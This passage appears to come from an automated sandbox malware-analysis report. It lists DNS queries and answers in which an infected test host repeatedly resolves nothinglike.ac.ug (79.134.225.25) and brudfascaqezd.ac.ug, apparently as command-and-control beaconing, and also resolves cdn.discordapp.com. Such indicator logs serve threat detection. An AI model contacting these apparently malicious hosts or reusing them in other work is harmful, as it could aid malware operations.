                                          Jun 4, 2021 09:40:23.189179897 CEST192.168.2.48.8.8.80xd2eStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:24.409887075 CEST192.168.2.48.8.8.80x9c86Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:25.471311092 CEST192.168.2.48.8.8.80x9f28Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:26.689762115 CEST192.168.2.48.8.8.80x2b4aStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:27.849464893 CEST192.168.2.48.8.8.80xa26bStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.418231964 CEST192.168.2.48.8.8.80xa7d5Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.655761957 CEST192.168.2.48.8.8.80x4d3dStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:30.482249975 CEST192.168.2.48.8.8.80x1860Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:31.892159939 CEST192.168.2.48.8.8.80xf6ccStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:33.035231113 CEST192.168.2.48.8.8.80xfa74Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:34.236119986 CEST192.168.2.48.8.8.80x59f6Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:35.292241096 CEST192.168.2.48.8.8.80xa0a0Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:36.549367905 CEST192.168.2.48.8.8.80xef6fStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:37.678133011 CEST192.168.2.48.8.8.80xbefaStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.007536888 CEST192.168.2.48.8.8.80xa9eStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.686717033 CEST192.168.2.48.8.8.80xbefaStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:39.890947104 CEST192.168.2.48.8.8.80xaeeStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:40.951872110 CEST192.168.2.48.8.8.80xd728Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:42.213363886 CEST192.168.2.48.8.8.80xdc3dStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:43.303922892 CEST192.168.2.48.8.8.80xb7a7Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:44.619203091 CEST192.168.2.48.8.8.80xe6a4Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:45.677834988 CEST192.168.2.48.8.8.80x9e3dStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:47.621577024 CEST192.168.2.48.8.8.80x7e16Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:48.971319914 CEST192.168.2.48.8.8.80x4089Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:50.174776077 CEST192.168.2.48.8.8.80x4bbdStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:51.236432076 CEST192.168.2.48.8.8.80xc9fcStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:52.444996119 CEST192.168.2.48.8.8.80xf5bStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:53.502222061 CEST192.168.2.48.8.8.80xf78eStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:54.703207016 CEST192.168.2.48.8.8.80xd592Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:55.762176037 CEST192.168.2.48.8.8.80xdb85Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:57.114552975 CEST192.168.2.48.8.8.80x13c7Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:58.169900894 CEST192.168.2.48.8.8.80x4c29Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:59.510843992 CEST192.168.2.48.8.8.80x936cStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:00.566936016 CEST192.168.2.48.8.8.80x45ceStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:01.952771902 CEST192.168.2.48.8.8.80x4f6dStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:03.012248039 CEST192.168.2.48.8.8.80x135aStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:04.241699934 CEST192.168.2.48.8.8.80xc8d0Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:05.381131887 CEST192.168.2.48.8.8.80xf803Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:06.781021118 CEST192.168.2.48.8.8.80xbf57Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:07.852442980 CEST192.168.2.48.8.8.80xbfdeStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:09.087080956 CEST192.168.2.48.8.8.80x1fe4Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:10.148986101 CEST192.168.2.48.8.8.80xfe4aStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:11.368159056 CEST192.168.2.48.8.8.80x20b0Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:12.430563927 CEST192.168.2.48.8.8.80xa7b0Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:13.652421951 CEST192.168.2.48.8.8.80x8da9Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:14.711209059 CEST192.168.2.48.8.8.80xcb28Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:15.930104017 CEST192.168.2.48.8.8.80x84aStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:17.113964081 CEST192.168.2.48.8.8.80x6cccStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:18.341006994 CEST192.168.2.48.8.8.80x5dc6Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:19.466461897 CEST192.168.2.48.8.8.80xf0dfStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:20.680043936 CEST192.168.2.48.8.8.80x37f3Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:21.743691921 CEST192.168.2.48.8.8.80x1ba3Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:22.963929892 CEST192.168.2.48.8.8.80x5b84Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:24.024235964 CEST192.168.2.48.8.8.80xfa28Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:25.228212118 CEST192.168.2.48.8.8.80x11deStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:26.291290998 CEST192.168.2.48.8.8.80xc8dfStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:27.510420084 CEST192.168.2.48.8.8.80xc7dcStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:28.571286917 CEST192.168.2.48.8.8.80x1bb7Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:29.790783882 CEST192.168.2.48.8.8.80x5d38Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:30.856579065 CEST192.168.2.48.8.8.80x22d3Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:32.107619047 CEST192.168.2.48.8.8.80x32b1Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:33.167161942 CEST192.168.2.48.8.8.80x54cdStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:34.388963938 CEST192.168.2.48.8.8.80xaf5Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:35.449734926 CEST192.168.2.48.8.8.80x4e71Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:36.683897972 CEST192.168.2.48.8.8.80x7148Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:37.807146072 CEST192.168.2.48.8.8.80x1ad8Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:39.149837017 CEST192.168.2.48.8.8.80x9738Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:40.482820988 CEST192.168.2.48.8.8.80xeb4eStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:41.715715885 CEST192.168.2.48.8.8.80x6600Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:42.777014971 CEST192.168.2.48.8.8.80xad4Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:43.996402025 CEST192.168.2.48.8.8.80x793Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:45.058801889 CEST192.168.2.48.8.8.80x5657Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:46.277839899 CEST192.168.2.48.8.8.80x2653Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:47.362359047 CEST192.168.2.48.8.8.80x7ab2Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:48.591324091 CEST192.168.2.48.8.8.80x35d4Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:49.652962923 CEST192.168.2.48.8.8.80xd25Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:50.874732971 CEST192.168.2.48.8.8.80xaeadStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:51.934591055 CEST192.168.2.48.8.8.80xdbc9Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:53.155333042 CEST192.168.2.48.8.8.80x4dStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:54.217448950 CEST192.168.2.48.8.8.80x2254Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:55.435005903 CEST192.168.2.48.8.8.80x80a1Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:56.497416019 CEST192.168.2.48.8.8.80x4054Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:57.716850996 CEST192.168.2.48.8.8.80x337aStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:58.778393984 CEST192.168.2.48.8.8.80x7eaeStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:59.995588064 CEST192.168.2.48.8.8.80x8ef4Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:01.040570021 CEST192.168.2.48.8.8.80x6fbeStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:02.247749090 CEST192.168.2.48.8.8.80xf03cStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:03.308010101 CEST192.168.2.48.8.8.80x70d4Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:04.529351950 CEST192.168.2.48.8.8.80xd48eStandard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:39:57.198767900 CEST8.8.8.8192.168.2.40xf48bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:16.129209995 CEST8.8.8.8192.168.2.40x559fNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:17.515693903 CEST8.8.8.8192.168.2.40x89d1Server failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:18.656070948 CEST8.8.8.8192.168.2.40xb28fNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:19.881160975 CEST8.8.8.8192.168.2.40xd1a1Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:20.940700054 CEST8.8.8.8192.168.2.40x3c4No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:22.180686951 CEST8.8.8.8192.168.2.40x54e8Server failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:23.238006115 CEST8.8.8.8192.168.2.40xd2eNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:24.458822012 CEST8.8.8.8192.168.2.40x9c86Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:25.520107031 CEST8.8.8.8192.168.2.40x9f28No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:26.738759995 CEST8.8.8.8192.168.2.40x2b4aName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:27.899045944 CEST8.8.8.8192.168.2.40xa26bNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.469103098 CEST8.8.8.8192.168.2.40xa7d5Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:29.707072973 CEST8.8.8.8192.168.2.40x4d3dNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:30.605134964 CEST8.8.8.8192.168.2.40x1860No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:32.028281927 CEST8.8.8.8192.168.2.40xf6ccServer failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:33.085849047 CEST8.8.8.8192.168.2.40xfa74No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:34.285319090 CEST8.8.8.8192.168.2.40x59f6Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:35.394838095 CEST8.8.8.8192.168.2.40xa0a0No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:36.664606094 CEST8.8.8.8192.168.2.40xef6fName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.057444096 CEST8.8.8.8192.168.2.40xa9eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.735856056 CEST8.8.8.8192.168.2.40xbefaNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:38.959199905 CEST8.8.8.8192.168.2.40xbefaNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:39.940066099 CEST8.8.8.8192.168.2.40xaeeName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:41.000473976 CEST8.8.8.8192.168.2.40xd728No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:42.285602093 CEST8.8.8.8192.168.2.40xdc3dServer failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:43.352905035 CEST8.8.8.8192.168.2.40xb7a7No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:44.667825937 CEST8.8.8.8192.168.2.40xe6a4Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:45.728987932 CEST8.8.8.8192.168.2.40x9e3dNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:47.670643091 CEST8.8.8.8192.168.2.40x7e16Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:49.019717932 CEST8.8.8.8192.168.2.40x4089No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:50.223773003 CEST8.8.8.8192.168.2.40x4bbdName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:51.287056923 CEST8.8.8.8192.168.2.40xc9fcNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:52.494193077 CEST8.8.8.8192.168.2.40xf5bServer failure (2)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:53.551012993 CEST8.8.8.8192.168.2.40xf78eNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:54.753180981 CEST8.8.8.8192.168.2.40xd592Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:55.813472033 CEST8.8.8.8192.168.2.40xdb85No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:57.156025887 CEST8.8.8.8192.168.2.40x13c7Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:58.218678951 CEST8.8.8.8192.168.2.40x4c29No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:59.560050964 CEST8.8.8.8192.168.2.40x936cName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:00.669122934 CEST8.8.8.8192.168.2.40x45ceNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:02.001405954 CEST8.8.8.8192.168.2.40x4f6dName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:03.061315060 CEST8.8.8.8192.168.2.40x135aNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:04.290596962 CEST8.8.8.8192.168.2.40xc8d0Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:05.429944038 CEST8.8.8.8192.168.2.40xf803No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:06.830806971 CEST8.8.8.8192.168.2.40xbf57Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:07.903352022 CEST8.8.8.8192.168.2.40xbfdeNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:09.129702091 CEST8.8.8.8192.168.2.40x1fe4Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:10.197743893 CEST8.8.8.8192.168.2.40xfe4aNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:11.409699917 CEST8.8.8.8192.168.2.40x20b0Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:12.471990108 CEST8.8.8.8192.168.2.40xa7b0No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:13.701833963 CEST8.8.8.8192.168.2.40x8da9Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:14.761611938 CEST8.8.8.8192.168.2.40xcb28No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:15.979192019 CEST8.8.8.8192.168.2.40x84aName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:17.167419910 CEST8.8.8.8192.168.2.40x6cccNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:18.453221083 CEST8.8.8.8192.168.2.40x5dc6Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:19.515099049 CEST8.8.8.8192.168.2.40xf0dfNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:20.731895924 CEST8.8.8.8192.168.2.40x37f3Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:21.794507027 CEST8.8.8.8192.168.2.40x1ba3No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:23.012999058 CEST8.8.8.8192.168.2.40x5b84Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:24.065589905 CEST8.8.8.8192.168.2.40xfa28No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:25.277705908 CEST8.8.8.8192.168.2.40x11deName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:26.342190981 CEST8.8.8.8192.168.2.40xc8dfNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:27.559171915 CEST8.8.8.8192.168.2.40xc7dcName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:28.619645119 CEST8.8.8.8192.168.2.40x1bb7No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:29.840023994 CEST8.8.8.8192.168.2.40x5d38Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:30.906867027 CEST8.8.8.8192.168.2.40x22d3No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:32.156562090 CEST8.8.8.8192.168.2.40x32b1Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:33.215828896 CEST8.8.8.8192.168.2.40x54cdNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:34.438519001 CEST8.8.8.8192.168.2.40xaf5Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:35.498428106 CEST8.8.8.8192.168.2.40x4e71No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:36.733165979 CEST8.8.8.8192.168.2.40x7148Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:37.855993032 CEST8.8.8.8192.168.2.40x1ad8No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:39.199364901 CEST8.8.8.8192.168.2.40x9738Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:40.531407118 CEST8.8.8.8192.168.2.40xeb4eNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:41.765302896 CEST8.8.8.8192.168.2.40x6600Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:42.827914000 CEST8.8.8.8192.168.2.40xad4No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:44.045500994 CEST8.8.8.8192.168.2.40x793Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:45.107799053 CEST8.8.8.8192.168.2.40x5657No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:46.326437950 CEST8.8.8.8192.168.2.40x2653Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:47.411079884 CEST8.8.8.8192.168.2.40x7ab2No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:48.640156031 CEST8.8.8.8192.168.2.40x35d4Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:49.694082975 CEST8.8.8.8192.168.2.40xd25No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:50.925890923 CEST8.8.8.8192.168.2.40xaeadName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
